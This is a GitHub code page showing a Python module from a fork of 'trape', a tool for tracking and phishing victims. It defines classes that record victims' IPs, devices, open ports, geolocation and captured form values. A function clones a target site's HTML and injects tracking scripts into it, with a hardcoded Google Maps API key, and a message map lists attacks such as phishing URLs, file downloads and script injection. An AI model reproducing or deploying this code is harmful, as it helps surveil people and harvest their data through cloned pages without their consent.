forked from jofpin/trape
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathuser_objects.py
More file actions
executable file
·87 lines (82 loc) · 3.44 KB
/
user_objects.py
File metadata and controls
executable file
·87 lines (82 loc) · 3.44 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/jofpin/trape
#
# Copyright 2018 by Jose Pino (@jofpin) / <jofpin@gmail.com>
#**
class victim(object):
def __init__(self, vId, ip, device, browser, version, ports, cpu, date):
self.vId = vId
self.ip = ip
self.device = device
self.browser = browser
self.version = version
self.ports = ports
self.cpu = cpu
self.date = date
class victim_geo(object):
def __init__(self, id, city, country_code, country_name, ip, latitude, longitude, metro_code, region_code, region_name, time_zone, zip_code, isp, ua, refer):
self.id = id
self.city = city
self.country_code = country_code
self.country_name = country_name
self.ip = ip
self.latitude = latitude
self.longitude = longitude
self.metro_code = metro_code
self.region_code = region_code
self.region_name = region_name
self.time_zone = time_zone
self.zip_code = zip_code
self.isp = isp
self.ua = ua
self.refer = refer
class victim_request(object):
def __init__(self, id, site, fid, name, value, sId):
self.id = id
self.site = site
self.fid = fid
self.name = name
self.value = value
self.sId = sId
def victim_headers(ua):
return [ ("User-Agent", ua),
("Content-Type", "text/html; charset=utf-8"),
("Accept", "text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.8"),
("Connection", "keep-alive"),
("DNT", "1"), # Do Not Track (info here: https://www.w3.org/TR/tracking-dnt/)
("Keep-Alive", "115")
]
def victim_inject_code(html, script = 'a', url_to_clone = '', gMapsApiKey = 'AIzaSyBUPHAjZl3n8Eza66ka6B78iVyPteC5MgM'):
url_to_clone = str(url_to_clone)
html = html.replace('src="', 'src="' + url_to_clone + '/')
html = html.replace("src='", "src='" + url_to_clone + '/')
html = html.replace('src="' + url_to_clone + '/' + 'http', 'src="http')
html = html.replace("src='" + url_to_clone + '/' + 'http', "src='http")
html = html.replace("href='", "href='" + url_to_clone + '/')
html = html.replace('href="', 'href="' + url_to_clone + '/')
html = html.replace('href="' + url_to_clone + '/' + 'http', 'href="http')
html = html.replace("href='" + url_to_clone + '/' + 'http', "href='http")
html = html.replace('</head>', '<script type="text/javascript" src="/static/js/libs.min.js"></script></head>')
html = html.replace('</head>', '<script type="text/javascript">window.gMapsApiKey="' + str(gMapsApiKey) + '";</script></head>')
html = html.replace('</head>', '<script type="text/javascript" src="/static/js/base.js"></script></head>')
html = html.replace('</head>', '<script type="text/javascript" src="/static/js/' + script + '.js"></script></head>')
return html
def attacks_hook_message(data):
return {
'network' : 'Detected network ',
'url' : "Open url phishing ",
'redirect' : "Redirecting to ",
'alert' : "Sending alert ",
'execute' : "Downloading file ",
'talk' : "Sending voice message ",
'jscode' : "Sending Script ",
'jsscript' : "Injecting Script "
}.get(data, False)